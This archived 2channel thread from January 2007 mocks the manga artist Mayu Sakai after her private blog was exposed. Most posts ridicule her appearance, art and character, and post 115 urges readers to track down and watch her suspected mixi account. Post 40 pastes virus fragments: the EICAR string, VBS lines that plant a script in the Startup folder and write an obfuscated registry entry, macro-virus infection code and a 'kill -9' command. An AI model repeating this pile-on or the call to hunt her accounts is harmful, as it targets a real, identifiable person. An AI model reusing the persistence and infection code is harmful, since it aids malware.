2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【裏ブログで】酒井まゆ17【ハフハフ】

1 :花と名無しさん:2007/01/02(火) 12:50:56 ID:???0
2006年8月にりぼん作家への誹謗中傷を含んだ批判、
自身の描いた連載作品のカラー扉の印刷の悪さについての文句、
2ちゃんねらーに対しての罵倒や愚痴、
サイン会で顔を出すと容姿についてなにかしら言及されることについて「顔に自信があればこんな仕事についてねーよ」、
「仕事なんだよ仕事。円滑に人間関係進めるのも含めて。ガキは黙ってろ。」、
「某大型掲示板(2ちゃんねるのことと思われる)はデスノートみたいにレスした奴が全員死ねばいいのに」
等の発言や汚い言葉遣いなどを網羅した裏ブログを晒された
りぼんの漫画家、 酒井まゆ のスレッドだお!(^ω^)

Q.まゆぽその表ブログ貼って欲しいお(^ω^)
A.酒井まゆ公式ブログは、まゆぽそが認めた人以外リンク禁止だお(^ω^)
【さかいまゆ ぬるまゆ】でぐぐれ、馬鹿が。

信者もファンもアンチも通行人もママーリいくんだお!(^^ω)
次スレは>>950あたりで立てるお!(^ ^)   ω
テンプレ変更禁止だおω()
現在本誌にていろんな意味でロッキンヘブン大好評★連載中!!

ぽそテンプレ集 【↓初めての人はまずココを読んでお!(^^ω)】
http://mayuposo.blog.shinobi.jp/

【関連スレ】りぼんの漫画について Part.94
http://comic7.2ch.net/test/read.cgi/gcomic/1166537117/
【裏ブログ】酒井まゆ16【風化はさせない(^ω^)】
http://comic7.2ch.net/test/read.cgi/gcomic/1164367596/

2 :花と名無しさん:2007/01/02(火) 12:51:51 ID:???0
よろしき

3 :花と名無しさん:2007/01/02(火) 12:57:36 ID:???0
裏ブログでの発言
http://mayuposo.blog.shinobi.jp/Entry/7/
まゆぽそ用語
http://mayuposo.blog.shinobi.jp/Entry/8/
まゆぽそ漫画解説
http://mayuposo.blog.shinobi.jp/Entry/9/
まゆぽそ発言集
http://mayuposo.blog.shinobi.jp/Entry/10/
その他のテンプレ
http://mayuposo.blog.shinobi.jp/Entry/11/
【過去スレ】
【ぽそりぽそられ】酒井まゆ9【ぽそられる】
http://comic6.2ch.net/test/read.cgi/gcomic/1156250125/
【WELCOME】酒井まゆ8【まゆぽん(^ω^)】
http://comic6.2ch.net/test/read.cgi/gcomic/1156076832/979n-
【ジェバンニが】酒井まゆ7【一晩で】
http://comic6.2ch.net/test/read.cgi/gcomic/1155973353/
【レスったら】酒井まゆ6【デスノられる】
http://comic6.2ch.net/test/read.cgi/gcomic/1155896683/
【レスしたヤツ】酒井まゆ5【死亡だお!(^ω^) 】
http://comic6.2ch.net/test/read.cgi/gcomic/1155752999/
【美人なら】酒井まゆ4【こんな仕事ついてね-よ】
http://comic6.2ch.net/test/read.cgi/gcomic/1155661850/
【スランプ皆無】+++酒井まゆ+++3【マムシオーレ】
http://comic6.2ch.net/test/read.cgi/gcomic/1126396628/
酒井まゆってどうですか・2・
http://comic6.2ch.net/test/read.cgi/gcomic/1073523200/
【復】酒井まゆってどうですか【刻】
http://comic.2ch.net/test/read.cgi/gcomic/1038372429/
↓HTML化した過去ログが置いてあるお!
http://mayuposo.blog.shinobi.jp/Entry/6/


4 :花と名無しさん:2007/01/02(火) 13:20:09 ID:???O
>1 乙〜
一番乗りかお?(^ω^)

5 :花と名無しさん:2007/01/02(火) 13:23:45 ID:???0
んだ(^ω^)

6 :花と名無しさん:2007/01/02(火) 13:50:01 ID:???O
>>1乙!たててくれてありがとうだお(^ω^)
オマイは世界一のぽそらーだお!

7 :花と名無しさん:2007/01/02(火) 18:20:45 ID:???O
三回目のスレ立て乙ですお(^ω^)
>>1がいるから頑張れるお(^ω^)

8 :花と名無しさん:2007/01/02(火) 20:28:50 ID:UnJVW81QO
ぽそ語やぽそ愛用顔文字使うのは構わないから内容のある書き込みしてほしい。他人が読んで面白いこと書こう。じゃないとチラツの裏みたいだから。ぽそらーもぽそも。

9 :花と名無しさん:2007/01/02(火) 20:57:42 ID:???O
>>8sageを覚えてからね来てね。

10 :花と名無しさん:2007/01/02(火) 21:19:25 ID:???O
>>1 乙華麗だお!
1がいるからがんばれるお(^ω^)

11 :花と名無しさん:2007/01/02(火) 23:02:13 ID:UnJVW81QO
(・ω・)がババババ≡つってやってるAAくれ

12 :花と名無しさん:2007/01/03(水) 00:05:52 ID:aHRdOOhm0
ささささ酒井ッ ドキッドキッ
ぽぽぽぽぽぽぽぽぽぽぽぽッ…ぽそやッ!⇒http://www.youtube.com/watch?v=U7TjhZI9qkE




13 :花と名無しさん:2007/01/03(水) 00:39:41 ID:???O
1さん乙華麗(^ω^)

14 :花と名無しさん:2007/01/03(水) 02:15:03 ID:???O
(^ω^セ)

15 :花と名無しさん:2007/01/03(水) 02:33:06 ID:???O
ぽその今年の目標はなんだお?(^ω^)

16 :花と名無しさん:2007/01/03(水) 02:52:45 ID:???O
>>15さかなくんと友達になることだお(^ω^)

17 :花と名無しさん:2007/01/03(水) 03:37:45 ID:???O
まゆぽそ?ハフハフしてやんよ
  ∧ ∧
 (`・ω・)=つ≡つ
 (っ ≡つ=つ
 /   ) ハフハフハフハフ
 ( / ̄∪

18 :花と名無しさん:2007/01/03(水) 05:54:05 ID:???O
ハフハフハフハフハフハフハフハフハフハフハフハフハフハフハフ( 。ω゜)ハフハフハフハフハフハフハフハフハフハフハフハフハフハフハフ

19 :花と名無しさん:2007/01/03(水) 08:45:42 ID:???O
もまいら、どうしたの…??;

20 :花と名無しさん:2007/01/03(水) 10:24:21 ID:???O
おはようだおー
異様な雰囲気漂ってるおね(^ω^;)

21 :花と名無しさん:2007/01/03(水) 12:58:57 ID:???O
お正月だよ!
ぽそエモン
さかなと
ハフハフ祭り〜(^ω^)

22 :花と名無しさん:2007/01/03(水) 18:22:26 ID:???O
こっち向いてまゆぽ!

23 :花と名無しさん:2007/01/03(水) 19:18:49 ID:???O
>>22
( ^ω^ )

24 :花と名無しさん:2007/01/03(水) 20:10:39 ID:???O
コミックソの柱アップたのんます

25 :花と名無しさん:2007/01/03(水) 20:45:39 ID:???O
裏ブログでバブバブ

26 :花と名無しさん:2007/01/03(水) 21:56:53 ID:FYIayBRF0
>>1乙!

27 : ◆S.MAYUa8v2 :2007/01/04(木) 00:17:21 ID:???0
まゆぽんかわいいよまゆぽん

28 :花と名無しさん:2007/01/04(木) 01:13:24 ID:???O
カ、カオスだお(^ω^)

29 :花と名無しさん:2007/01/04(木) 02:42:33 ID:???O
今急にスレタイ見て思ったんだけどやっぱり(^ω^)←入れた方がよかったね。なんかぽそスレな感じが薄れたお(^ω^;)

30 :花と名無しさん:2007/01/04(木) 04:32:30 ID:???O
ぽーそーぽーそーあさはらぽーそー
あーさーはーらーぽーーそーー
(^ω^)(^ω^)(^ω^)(^ω^)(^ω^)

31 :花と名無しさん:2007/01/04(木) 09:05:13 ID:???O
>>29ワイもそれ思ったお(^ω^)←は重要だおね(´ω`)リクしたおに……だが、時計の針は元には戻らないお(^ ω ^)

32 :花と名無しさん:2007/01/04(木) 11:09:40 ID:???O
まゆぽそ〜新年会行った〜??(^ω^)
まゆたんみたいに仮装した写真Upしてほしいお(^ω^)
つか新年会とかいつあるんだろ…

33 :花と名無しさん:2007/01/04(木) 11:15:52 ID:???O
ナチ日記に書いてありそうだお(^ω^)
あんな事起こして新年会行けちゃうなんて凄いお(^ω^;)
行ったのか不明だが。

34 :花と名無しさん:2007/01/04(木) 13:56:55 ID:???0
>>29
>>31
んー次から最終決定案を分かりやすくだしといてほしいお
レス最後のあたりにこれってあったから立ててるお|ω ^)
だが自分でも顔文字合った方がいいって今思ったお(^ω^)

35 :花と名無しさん:2007/01/04(木) 15:15:16 ID:1biLMi7x0
(^ω^)(^ω^)(^ω^)(^ω^)(^ω^)

36 :花と名無しさん:2007/01/04(木) 15:17:50 ID:???0
(^ω^)ウィッシュ!

37 :花と名無しさん:2007/01/04(木) 16:12:07 ID:???O
なんだかんだで1乙だし、まゆぽのスレには違いないお(^ω^)
よろしこ!!

38 :花と名無しさん:2007/01/04(木) 16:18:17 ID:???0
よろしき!(^ω^)

39 :花と名無しさん:2007/01/04(木) 16:20:47 ID:???O
>>37
馬鹿ガッ(^ω^)

40 :花と名無しさん:2007/01/04(木) 16:23:19 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

41 :花と名無しさん:2007/01/04(木) 17:44:12 ID:SEX7IIal0
年末に余裕ぶっこきすぎた!(@ぽそブログより)

ぽそは余裕じゃなくて調子ぶっこきすぎだお(^ω^)

42 :花と名無しさん:2007/01/04(木) 19:01:34 ID:???O
ワイも前スレでスレタイあげてたときは今のでいいと思ったんだけど実際並んでみたらあれれだったお(^ω^;)でも>>1には感謝だお(^ω^)ありがとう!
次スレには(^ω^)←絶対入れるお!

43 :花と名無しさん:2007/01/04(木) 19:16:08 ID:???O
>>42 おう!だお(^ω^)
遅ればせながらブログ見てきた。
コミクス企画が何たらて言ってたけど…普通にお便りコーナー??(^ω^;
何か「金魚の名前考えてください」に答えてるみたいだけど;

44 :花と名無しさん:2007/01/04(木) 20:04:53 ID:???0
>>42
おk毛(^ω^)

コミクス企画かぁ
また痛タな内容なんだろうなあ(^ω^)

45 :花と名無しさん:2007/01/04(木) 22:57:35 ID:???O
ちょwwww

金 魚 = 魚

手紙出した椰子ここの住人じゃないだろうなwwww

46 :花と名無しさん:2007/01/04(木) 23:43:17 ID:NqtPDiJmO
まゆぽにハフハフとかいろいろ書いた年賀状だしはぐった。

47 :花と名無しさん:2007/01/05(金) 00:52:44 ID:???O
>>46
馬鹿ガッ(^ω^)

48 :花と名無しさん:2007/01/05(金) 00:53:48 ID:???O
>>45 おまい…ww
ホントにそうだとしたらGJ(^ω^)w
写真よくみえなかったけどなんて答えたんだろ…自キャラの名前はヤメテPO;(^^ω)

49 :花と名無しさん:2007/01/05(金) 01:01:56 ID:SaWBLJXbO
http://1hp.jp/?id=ragan

50 :花と名無しさん:2007/01/05(金) 01:11:20 ID:???O
>>49宣伝注意。みんな踏むなお(^ω^;)

51 :花と名無しさん:2007/01/05(金) 03:36:06 ID:???O
ご注意ありがとうだお(^ω^)

52 :花と名無しさん:2007/01/05(金) 07:38:52 ID:???O
おはようだお(^ω^)
>>50 ありがとうだお(^ω^)ハフハフ!

53 :花と名無しさん:2007/01/05(金) 08:54:01 ID:???O
まゆぽそ〜
おはようだお(^ω^) ブログ読んだお(^ω^)まゆぽそ、でも馬鹿だおな裏ブログ発覚しなかったら、こんなことにはならなかったのにお
まゆぽそ自業自得だから仕方ないお(^ω^)ハフハフ♪

54 :花と名無しさん:2007/01/05(金) 10:16:25 ID:???O
ワイはまゆぽそは最高のエンターテイナーだと思ってるおw(^ω^)

55 :花と名無しさん:2007/01/05(金) 12:01:38 ID:???O
ブクオフで立ち読みしてきたお!(^ω^)

ボク旅はキレイな絵だったお(^ω^)
ナインパズルもヒロインはかわいかったお(^ω^)

永田苺あたりから魚類に進化してたお(^ω^)

56 :花と名無しさん:2007/01/05(金) 16:25:32 ID:???O
エンターテイナーってwぽそがエンターテイナー(^ω^)?

57 :花と名無しさん:2007/01/05(金) 19:16:41 ID:???0
またお前ら酒井先生を叩いてるのかよ




ねこだいすき

58 :57:2007/01/05(金) 19:18:09 ID:???0
縦読み作ろうとしたら途中で投稿してしまった( ^ω^)おっおっ

59 :花と名無しさん:2007/01/05(金) 19:21:11 ID:???0
オイオイ(^ω^;)

60 :花と名無しさん:2007/01/05(金) 19:33:42 ID:???O
>>57 文面恐すぎだろW
(^ω^)おっお

61 :花と名無しさん:2007/01/05(金) 19:37:31 ID:???O
妹バラバラスレ見てて気分悪い所に縦読みキタお(^ω^)
無理矢理過ぎるお(^ω^)w

62 :花と名無しさん:2007/01/05(金) 19:45:23 ID:???O
どうやって、ねこだいすきに繋げるつもりだったのかお?
興味津々だお(^ω^)

63 :花と名無しさん:2007/01/05(金) 20:54:47 ID:???O
ねり梅だいすき(^ω^)

64 :花と名無しさん:2007/01/05(金) 21:09:35 ID:dPuf6HRO0
千捺のユカイなLOST日記
http://tinatu.blog.shinobi.jp/

65 :花と名無しさん:2007/01/05(金) 22:42:39 ID:???O
今突然気になったんだがぽそらーの中にグロ画像とか平気で見れる強者はいるのかお?
ちなみにワイは全く見れない(^ω^;)

66 :花と名無しさん:2007/01/05(金) 23:00:13 ID:???O
>>65
ワイはグロ画像は平気だお(^ω^)
でも元気な時に見ないと落ち込んでしまうお(^ω^;)

67 :花と名無しさん:2007/01/05(金) 23:04:55 ID:???0
グロは無理だお。。。。
たまにふむけどな

68 :花と名無しさん:2007/01/06(土) 00:18:43 ID:???O
みれるお(^ω^)
でも一番黒いのはまゆぽそだお(^ω^)

69 :花と名無しさん:2007/01/06(土) 00:20:32 ID:???O
×黒い
○グロい

70 :花と名無しさん:2007/01/06(土) 00:54:20 ID:???O
腹グロい(^ω^)

71 :花と名無しさん:2007/01/06(土) 01:31:59 ID:nEpWSyik0
http://blog16.fc2.com/a/amatanoyo/file/1161963584790.jpgジャンプのトレードマークを左に90度回転させると萌える


72 :花と名無しさん:2007/01/06(土) 01:47:08 ID:???O
本物のマークとちょっと違うみたいだけど
感動した(^ω^)

73 :花と名無しさん:2007/01/06(土) 01:52:35 ID:???O
ぽそには関係ないネタだがありがとうだお(^ω^)

74 :花と名無しさん:2007/01/06(土) 12:31:08 ID:???O
>>66>>68オマイラすげーおΣ(^ω^)ワイなんか文章読んだだけでガクブルだお((((^ω^;))))電気消して寝れなくなるお!
ぽそが一番グロいけどね。

75 :花と名無しさん:2007/01/06(土) 12:35:02 ID:???O
変なもの踏まないように気をつけてお(^ω^)

76 :花と名無しさん:2007/01/06(土) 12:51:14 ID:???O
まゆぽその字って何か苛々する

77 :花と名無しさん:2007/01/06(土) 14:41:11 ID:???0
丸文字だよね古い言い方すると

78 :花と名無しさん:2007/01/06(土) 15:05:01 ID:???O
スレタイ見て、今度はネウロをパクったのかと思ったw

79 :花と名無しさん:2007/01/06(土) 15:35:19 ID:???O
みんなわ、まゆぽそホントに嫌いなの?
自分はまゆぽそおもしろいから好きだお(^ω^)
ロキヘブも好きだお(^ω^)

80 :花と名無しさん:2007/01/06(土) 15:51:25 ID:qdIwvc4pO
アンチをよそおった信者がまぎれこんでいるようです

81 :花と名無しさん:2007/01/06(土) 15:54:15 ID:???O
逆に考えるんだ!みたいな(^ω^)?

82 :花と名無しさん:2007/01/06(土) 15:56:00 ID:???O
今日は土曜(^ω^)

83 :花と名無しさん:2007/01/06(土) 16:02:11 ID:???O
>>80
どうでもいいがおまい、りぼん関係スレあげすぎだお(^ω^)
ガキは黙ってろ

84 :花と名無しさん:2007/01/06(土) 17:31:26 ID:???O
ブログ更新きたお(^ω^)

85 :花と名無しさん:2007/01/06(土) 20:39:48 ID:???O
友達いますよアピール?(^ω^)

86 :花と名無しさん:2007/01/06(土) 21:25:36 ID:???O
あせあせ(^ω^;)

…ハフハフには敵わないお( ^ ω ^ )

87 :花と名無しさん:2007/01/06(土) 21:36:41 ID:???O
流行りを作ると言うのも難しいものだな

88 :花と名無しさん:2007/01/06(土) 23:16:59 ID:???O
ぽそなんて嫌いだお!
けどぽそスレは激しく好きだお(^ω^)
ぽそらーも激しく好きだお(^ω^)

89 :花と名無しさん:2007/01/07(日) 00:05:36 ID:???O
ワイも(^ω^)
ぽそスレとぽそらーに出会えたのだけはぽそに感謝(^ω^)
祭りの時はかなり笑えて楽しかったお(^ω^)ハフハフ

90 : ◆S.MAYUa8v2 :2007/01/07(日) 00:16:48 ID:???0
誕生日キタ━━━━(゚∀゚)━━━━!!!!

91 :花と名無しさん:2007/01/07(日) 00:28:35 ID:???O
GちゃんとBarちゃんの誕生日がまゆぽそと四日違い…orz={まぁいいけど)

(^ω^)

92 :花と名無しさん:2007/01/07(日) 00:36:36 ID:???0
wikiが保護状態になって裏ブログの部分が丸ごと消えてる

93 :花と名無しさん:2007/01/07(日) 00:58:04 ID:???O
ぽその絵のデサーン回を益す毎にひどくなってるね あと槙のかくロリはチビッ子らしくかかれてるが酒井のかくチビッ子は頭と胴体のバランスがキモすぎる。

94 :花と名無しさん:2007/01/07(日) 01:36:16 ID:???O
ぽそ、目が横についてるだけでもお腹いっぱいだったのに
最近じゃ顎も鼻の下も長くなっちゃって
もう食べれないお
どうしてくれるお(^ω^)

95 :花と名無しさん:2007/01/07(日) 01:54:56 ID:???O
ぽそ〜もう少し絵を見直せだお〜(^ω^;)なんか周りの連載作家が成長していくなかぽそは退化してるお!ぽそ!自分の絵を客観的に見るんだ!!
とりあえずあげ

96 :花と名無しさん:2007/01/07(日) 09:28:45 ID:???O
ロキヘボ人気っていうのをみかけると
気になってしょうがないお(^ω^)
だからまゆぽがもし5巻まで出せたら
一気に買うつもりだお
お年玉も入ったしお(^ω^)

97 :花と名無しさん:2007/01/07(日) 11:09:25 ID:???O
>>96
募金に回したほうがいいお(^ω^)

98 :花と名無しさん:2007/01/07(日) 11:19:15 ID:???O
>>96
馬鹿ガッ(^ω^)




最近馬鹿ガッって突っ込むの多いお(^ω^)

99 :花と名無しさん:2007/01/07(日) 11:33:10 ID:???O
またウィキ改ざんしたんかお?懲りない女だお

100 :花と名無しさん:2007/01/07(日) 13:54:28 ID:???O
100ハフハフ

101 :花と名無しさん:2007/01/07(日) 17:28:54 ID:???O
おばちゃん!
このさんま何ハフハフだお(^ω^)?

102 :花と名無しさん:2007/01/07(日) 18:14:04 ID:???O
おばちゃんって誰の事だ?(^ω^)出直してこい(^ω^)

103 :花と名無しさん:2007/01/07(日) 18:23:06 ID:???O
誰かウィキもとに戻してほしいお(^ω^)

104 :花と名無しさん:2007/01/07(日) 19:18:57 ID:???O
ぽそ、無駄な抵抗はやめるんお(^ω^)
酒井まゆで検索すると裏ブログもついてくるし消えないお(^ω^)

105 :花と名無しさん:2007/01/07(日) 19:25:34 ID:???0
Wiki編集してるヒマがあったら面白いマンガを描く練習をした方がいいお(^ω^)
絵も直せるなら直したほうがいいおっおっ(^ω^)

106 :花と名無しさん:2007/01/07(日) 21:48:10 ID:???O
アホかってくらいワロタ
http://r.pic.to/8uwtj

107 :花と名無しさん:2007/01/07(日) 23:16:59 ID:???0
性格も(^ω^)

108 :花と名無しさん:2007/01/08(月) 00:19:40 ID:???O
>>106バロスwwwwwwww

109 :花と名無しさん:2007/01/08(月) 01:18:09 ID:???O
>>106
これは(^ω^)w
なんて作品だお?

110 :花と名無しさん:2007/01/08(月) 01:44:38 ID:???O
>>109
ヤングガンガン一人気のない漫画こと「いわせてみてえもんだ」
今日買ってきた最新号の話で、秀作(作品内で腐女子に大人気という設定の漫画キャラ)がお亡くなりになって泣くヒロイン

111 :花と名無しさん:2007/01/08(月) 07:55:28 ID:???O
ザザエ8(*^ω^*)8>>>>>>>>ジェリコの壁>>>>>>>>>>>>まゆぽそだお(^  ω  ^)

112 :花と名無しさん:2007/01/08(月) 08:57:55 ID:Cf5skYoJO
ジェリコの壁っていうとエヴァ思い出すお(^ω^)

113 :花と名無しさん:2007/01/08(月) 09:08:02 ID:???O
もっちょん…?(^ω^)

114 :花と名無しさん:2007/01/08(月) 11:37:29 ID:???O
110さすが人気のない作品はタイトルからして興味をそそられないな。ピクリともよみたくならねえ。ロッキンヘヴンも相当意味不明だけどな。ぬるコぽっぷみたいな音感で選んだろ

115 :花と名無しさん:2007/01/08(月) 11:45:02 ID:???O
酒井って絶対ミクシィやってそう。ミクシィで酒井らしきやつをさがしヲチしようぜ 第二の裏ブログをさがそうぜ 検索ワード サウンドホライズン 伊集院光 ウマイ棒 映画 テニヌの王子様 など

116 :花と名無しさん:2007/01/08(月) 12:07:32 ID:???0
はいはい携帯厨わろすわろす
せめて改行しようね(^ω^)

117 :花と名無しさん:2007/01/08(月) 13:04:23 ID:fsLZPxAN0
アシさんの誕生日も忘れるなんて まゆぽそ最低だお(^ω^)

118 :117:2007/01/08(月) 13:05:09 ID:???0
sage忘れたおっ(^ω^;)

119 :花と名無しさん:2007/01/08(月) 14:21:41 ID:???O
たまにはsage忘れる事もあるお(^ω^)気にするな(^ω^)

120 :花と名無しさん:2007/01/08(月) 14:40:15 ID:???O
もっちょんって久しぶりに出たな

121 :花と名無しさん:2007/01/08(月) 20:27:02 ID:???O
ぽその誕生日じゃないのか(^ω^)

122 :花と名無しさん:2007/01/09(火) 00:56:35 ID:???O
あ、ウィキ見るの忘れたお(^ω^;)
元に戻ったかお?

123 :花と名無しさん:2007/01/09(火) 01:45:43 ID:L9QsUlS9O
>>57 吹いたwwwww

ぜひリベンジして完成汁!

124 :花と名無しさん:2007/01/09(火) 02:16:35 ID:???O
まいどまいど同じ事ばっかり言ってるなお前ら
ゆかいか?叩くのそんなに楽しいか?
ぽんぽんぽんぽんよく出るなそんな汚い言葉
そんな事で酒井は凹まないよ?屁でもないわそんなん
しっかしよくもまぁこんだけ叩き続けるね君達は。
ねんちゃく(なぜか変換できなry乙

125 :花と名無しさん:2007/01/09(火) 03:39:10 ID:???O
またうまい棒かお?
ゆうしょくなお?
ぽりぼりたべるお?
そんなに沢山??
しぼうが増えるお!
ねるの?食べた後速攻?

バフハフハフハフ(^ω^)
ガッ(゚ω゚;)

126 :花と名無しさん:2007/01/09(火) 09:57:44 ID:???O
おまいらいいお(^ω^)最高だお

127 :花と名無しさん:2007/01/09(火) 14:17:42 ID:???O
>>124オマイも最高だお(^ω^)

128 :花と名無しさん:2007/01/09(火) 18:00:30 ID:???0
【幻想】 サウンドホライズン 2nd 【楽団】
http://sakura03.bbspink.com/test/read.cgi/801/1164454422/

さすがまゆぽセンセイは目の付け所が違うお(^ω^)

129 :花と名無しさん:2007/01/09(火) 19:03:32 ID:???O
801(^ω^)さすがぽそだお

130 :花と名無しさん:2007/01/09(火) 21:29:39 ID:???O




(^     ω    ^)

131 :花と名無しさん:2007/01/10(水) 01:51:05 ID:???O
>>130 ブログ、魚と関係あんのかとオモタ(^ω^)

まゆぽそ、フリが下手!半分眠ってて気がついたらキャラに鼻毛かいてた!
とかを希望(^ω^)!

132 :花と名無しさん:2007/01/10(水) 07:52:41 ID:???O
>>131半分眠ってて自分の絵が魚に見えて気がついたらキャラにヒレかいてた!
とかを希望(^ω^)!

133 :花と名無しさん:2007/01/10(水) 09:18:26 ID:???O
>>132 ついにまゆぽそ自覚(*^^ω)=3

134 :花と名無しさん:2007/01/10(水) 10:17:49 ID:???0
「よろしこ」とか・・・まゆぽそえろいね!(^ω^)

135 :花と名無しさん:2007/01/10(水) 13:43:04 ID:???O
シコシコ(^ω^)ゞωキャンタマだお

ハフハフ(゚ω゚;)≡3ハァハフ

136 :花と名無しさん:2007/01/10(水) 17:13:35 ID:???O
満足してはいけないお(^ω^)

137 :花と名無しさん:2007/01/10(水) 19:20:50 ID:???O
打ち切り(^^ω)

138 :花と名無しさん:2007/01/10(水) 21:59:56 ID:???0
まゆぽそ面白いなー(^ω^)
正直とっくに飽きたけどムキになる感じが笑える

139 :花と名無しさん:2007/01/11(木) 00:52:34 ID:???O
ねらーなんて気にしないよ、言うだけなら簡単。とか思いつつ気にしまくってるまゆぽそ(^ω^)

140 :花と名無しさん:2007/01/11(木) 01:20:50 ID:???O
あれだけ時間かけたのに印刷ry
とか愚痴りそうだお

141 :花と名無しさん:2007/01/11(木) 03:58:09 ID:???O
あぁ
かなり
いっつもだガッ
くそつまらないお
びっくりだおね
わははハフハフ( ^ω^)人(^ω^ )

でもぽそ大好きだぉ♪(笑)

by(^ω^)ねしいもきなかさおそぽゆま

142 :首輪でハフハフ!(^ω^):2007/01/11(木) 13:25:07 ID:???O
もっちょんて魚書いてる人の本名かお?(^ω^)
犬かお?アシサン?マイサン?
わからん…
まぁどっちでも…(^ω^)イイ!けど

143 :花と名無しさん:2007/01/11(木) 16:59:36 ID:???0
携帯っこがほとんどだから
スレは伸びてても
「おすすめ2ちゃんねる」が
なかなかつかないおね…

144 :金かえせ酒井:2007/01/11(木) 23:28:30 ID:8UMdUfq3O
124になぜか酒井が名無しでコウリンしてた件。屁でもないわそんなん。←なぜ酒井さんでもないきみが屁か屁でもないかわかるの。酒井は2CHに書き込んでる暇にデッサンの練習でもしてなさい。

145 :花と名無しさん:2007/01/11(木) 23:38:03 ID:8UMdUfq3O
このスレはリアル漫画家酒井さんとおしゃべりできるスレになりました。酒井たんに質問。槙陽子さんの新連載についてどう思いますか?

146 :花と名無しさん:2007/01/12(金) 00:51:29 ID:???0
いいと思うおw 今年は種村には負けないおww

147 :花と名無しさん:2007/01/12(金) 00:53:50 ID:???O
>>124はあれだお?(^ω^)どうしちゃったんだお?
ワイがおかしいのかお?怖いお(^ω^)

148 :花と名無しさん:2007/01/12(金) 02:10:00 ID:???0
どうしていつまでも
縦読みを覚えられない人がいるんだろうね。

149 :花と名無しさん:2007/01/12(金) 02:47:32 ID:???0
たて読みにもレスしたいお年頃なのらぁ☆

150 :花と名無しさん:2007/01/12(金) 04:18:13 ID:???O
まゆぽっそん便所臭いお
(・ω・)ノξ

151 :花と名無しさん:2007/01/12(金) 12:16:25 ID:???O
加齢臭(^ω^)

152 :花と名無しさん:2007/01/12(金) 12:37:57 ID:???O
まゆぽそと通信できるようなので、ヒットしそうなネタ投下↓

ヒロインは海付近に住む子なんだけど、ある日ヨーロッパ系の王子が流れついてくる。
で、王子を介抱しようとするけど失敗。リベンジするために孤島にすむ祖母に薬をもらって変身→王子とラブラブ(^ω^)

153 :花と名無しさん:2007/01/12(金) 13:33:08 ID:???O
ヨーロッパではなくインドの方がいいと思うお
インド系王子様(^ω^)

154 :花と名無しさん:2007/01/12(金) 17:51:22 ID:???O
2ch無くなったらぽそらーはどうすればいいんだお?(;ω;)

155 :さぁオチの時間だ:2007/01/12(金) 17:52:17 ID:???O
しまったー!!人魚姫が魚なのは下だけだったー!!!
みたいな(^Ω^)ω

156 :花と名無しさん:2007/01/12(金) 18:00:21 ID:???O
>>154
ぽそは喜ぶと思魚(^ω^)ぽそらーに叩かれなくてすむからな

ワイは寂しいお(´ω`)

157 :花と名無しさん:2007/01/12(金) 18:04:49 ID:???O
ぽそらーのみんなに会えなくなるのは嫌だお(´;ω;`)

158 :花と名無しさん:2007/01/12(金) 18:05:06 ID:???O
わいもさびしいお!(´;ω;`)
2ちゃんが無くなったら裏ブログがほんとに
風化してしまうお!!

159 :花と名無しさん:2007/01/12(金) 18:54:50 ID:???O
>>158
逆に考えるんだry

160 :花と名無しさん:2007/01/12(金) 19:28:54 ID:???0
まゆぽそおばちゃんまだりぼんにいたの?
目が腐るからそろそろ引退汁。(^ω^)

見苦しくしがみついてないで槙ようこに場所を譲れ

161 :花と名無しさん:2007/01/12(金) 20:17:14 ID:6YUsYue4O
ざまぁみろ。
私の悪口ばっか言ってるからこうなるんだよ

162 :花と名無しさん:2007/01/12(金) 20:30:48 ID:???O
>>161
下手な釣り乙だお(^ω^)

それにしてもにちゃんなくなっちゃうのやだお…(;ω⊂)

163 :花と名無しさん:2007/01/12(金) 21:04:34 ID:???O
2Chが15日に利用できなくなるってホントかお(ノ_・。)
ぽそらーはどうなるんかお?
憩いの場だったのに… 寂しいお…


164 :花と名無しさん:2007/01/12(金) 21:30:56 ID:???0
え、本気で2ch閉鎖なのかお?(^ω^;)

165 :花と名無しさん:2007/01/12(金) 21:56:04 ID:???O
>>164
ワイにはイマイチよくわからんけど、危ないってニュースきてたお(^ω^)
詳しくはニュー速行ってみてほしいお!

166 :花と名無しさん:2007/01/12(金) 22:26:08 ID:???O
会社員(35)はぽそに操られているんだ!
2chをデスノらないでくれお(^ω^)タノム

167 :花と名無しさん:2007/01/12(金) 22:44:35 ID:???O
まゆぽそ可愛いお(^ω^)
裏ブログの件がね

168 :花と名無しさん:2007/01/12(金) 22:56:11 ID:???O
閉鎖する前に裏ブログ事件を広めなくちゃ(^ω^)

169 :花と名無しさん:2007/01/13(土) 00:17:43 ID:???0
以前、まゆぽそ祭りの時に、誘導されてこちらへ伺った者です。
ぜひ、我らがシャワートイレ板へきてください!
待ってます!

2ちゃんねる閉鎖part2 -シャワートイレなら救える
http://bubble5.2ch.net/test/read.cgi/toilet/1168614157/

170 :花と名無しさん:2007/01/13(土) 00:34:27 ID:???O
おいおいまじかお(;^ω^)
【ネット】2ちゃんねる、15日にプロバイダーサービスを終了★3
http://news22.2ch.net/test/read.cgi/newsplus/1168609212/
どうなるのかお?ぽそらーともお別れかお…

171 :花と名無しさん:2007/01/13(土) 00:52:07 ID:???O
閉鎖の話はなるようにしかならないお(^ω^)
15日とか言われてるが、その時何があっても後悔しないようそれまでぽそるお(^ω^)


今由貴香織里さんのコミクス読んでたら、かわういって単語がでてきたおw

